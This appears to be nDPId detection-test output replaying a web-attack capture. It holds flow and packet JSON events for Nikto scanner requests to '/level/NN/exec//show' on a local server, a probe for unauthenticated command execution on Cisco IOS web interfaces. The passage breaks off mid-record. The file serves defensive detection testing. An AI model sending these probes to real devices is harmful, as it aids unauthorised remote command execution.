+00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":570,"flow_packet_id":1,"flow_last_seen":1576420277590,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277590,"pkt":"AAAAAAAAAAAAAAAACABFAADIMkhAAEAGCeZ\/AAABfwAAAcYOH5Ck4gq0tTkM3YAYAED+vAAAAQEICp1m\/n6dZv5+R0VUIC9sZXZlbC8yMi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjkpDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":570,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277590,"flow_last_seen":1576420277590,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277590,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50702,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/22\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001269)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":571,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277592,"flow_last_seen":1576420277592,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277592,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50704,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":571,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":571,"flow_packet_id":1,"flow_last_seen":1576420277592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277592,"pkt":"AAAAAAAAAAAAAAAACABFAADIGgdAAEAGIid\/AAABfwAAAcYQH5AVMSL0hIVMXoAYAED+vAAAAQEICp1m\/oCdZv5\/R0VUIC9sZXZlbC8yMy9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjcwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":571,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277592,"flow_last_seen":1576420277592,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277592,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50704,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/23\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001270)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":572,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277593,"flow_last_seen":1576420277593,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277593,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50706,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":572,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":572,"flow_packet_id":1,"flow_last_seen":1576420277593,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277593,"pkt":"AAAAAAAAAAAAAAAACABFAADI3vBAAEAGXT1\/AAABfwAAAcYSH5AD6eYZLZCITIAYAED+vAAAAQEICp1m\/oGdZv6BR0VUIC9sZXZlbC8yNC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277593,"flow_last_seen":1576420277593,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277593,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50706,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/24\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001271)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":573,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277595,"flow_last_seen":1576420277595,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277595,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50708,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":573,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":573,"flow_packet_id":1,"flow_last_seen":1576420277595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277595,"pkt":"AAAAAAAAAAAAAAAACABFAADIjYJAAEAGrqt\/AAABfwAAAcYUH5BJPLV3Xqa0Y4AYAED+vAAAAQEICp1m\/oOdZv6DR0VUIC9sZXZlbC8yNS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzIpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":573,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277595,"flow_last_seen":1576420277595,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277595,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50708,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/25\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001272)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":574,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277597,"flow_last_seen":1576420277597,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277597,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50710,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":574,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":574,"flow_packet_id":1,"flow_last_seen":1576420277597,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277597,"pkt":"AAAAAAAAAAAAAAAACABFAADI4QFAAEAGWyx\/AAABfwAAAcYWH5APltgJOmv38YAYAED+vAAAAQEICp1m\/oSdZv6ER0VUIC9sZXZlbC8yNi9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjczKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":574,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277597,"flow_last_seen":1576420277597,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277597,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50710,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/26\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001273)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":575,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277598,"flow_last_seen":1576420277598,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277598,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50712,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":575,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":575,"flow_packet_id":1,"flow_last_seen":1576420277598,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277598,"pkt":"AAAAAAAAAAAAAAAACABFAADIuK1AAEAGg4B\/AAABfwAAAcYYH5AkxYBd7ezrAoAYAED+vAAAAQEICp1m\/oadZv6GR0VUIC9sZXZlbC8yNy9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzQpDQoNCg=="} 
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":575,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277598,"flow_last_seen":1576420277598,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277598,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50712,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/27\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001274)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":576,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277600,"flow_last_seen":1576420277600,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277600,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":576,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":576,"flow_packet_id":1,"flow_last_seen":1576420277600,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277600,"pkt":"AAAAAAAAAAAAAAAACABFAADIQiNAAEAG+gp\/AAABfwAAAcYaH5DTCnrawy0BcYAYAED+vAAAAQEICp1m\/oidZv6IR0VUIC9sZXZlbC8yOC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjc1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":576,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277600,"flow_last_seen":1576420277600,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277600,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50714,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/28\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001275)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":577,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277602,"flow_last_seen":1576420277602,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277602,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50716,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":577,"flow_packet_id":1,"flow_last_seen":1576420277602,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277602,"pkt":"AAAAAAAAAAAAAAAACABFAADIalZAAEAG0dd\/AAABfwAAAcYcH5BVA1KtKWKiFYAYAED+vAAAAQEICp1m\/oqdZv6JR0VUIC9sZXZlbC8yOS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjc2KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":577,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277602,"flow_last_seen":1576420277602,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277602,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50716,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/29\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001276)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":578,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277604,"flow_last_seen":1576420277604,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277604,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50718,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":578,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":578,"flow_packet_id":1,"flow_last_seen":1576420277604,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277604,"pkt":"AAAAAAAAAAAAAAAACABFAADIeUZAAEAGwud\/AAABfwAAAcYeH5Dj\/UG+lxmHS4AYAED+vAAAAQEICp1m\/oudZv6LR0VUIC9sZXZlbC8zMC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":578,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277604,"flow_last_seen":1576420277604,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277604,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50718,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/30\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001277)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":579,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277607,"flow_last_seen":1576420277607,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277607,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50720,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":579,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":579,"flow_packet_id":1,"flow_last_seen":1576420277607,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277607,"pkt":"AAAAAAAAAAAAAAAACABFAADISctAAEAG8mJ\/AAABfwAAAcYgH5D3W3ExGI1+2IAYAED+vAAAAQEICp1m\/o6dZv6OR0VUIC9sZXZlbC8zMS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzgpDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":579,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277607,"flow_last_seen":1576420277607,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277607,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50720,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/31\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001278)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":580,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277608,"flow_last_seen":1576420277608,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277608,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50722,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":580,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":580,"flow_packet_id":1,"flow_last_seen":1576420277608,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277608,"pkt":"AAAAAAAAAAAAAAAACABFAADIARxAAEAGOxJ\/AAABfwAAAcYiH5DcsTnhkT\/ypIAYAED+vAAAAQEICp1m\/pCdZv6QR0VUIC9sZXZlbC8zMi9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjc5KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":580,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277608,"flow_last_seen":1576420277608,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277608,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50722,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
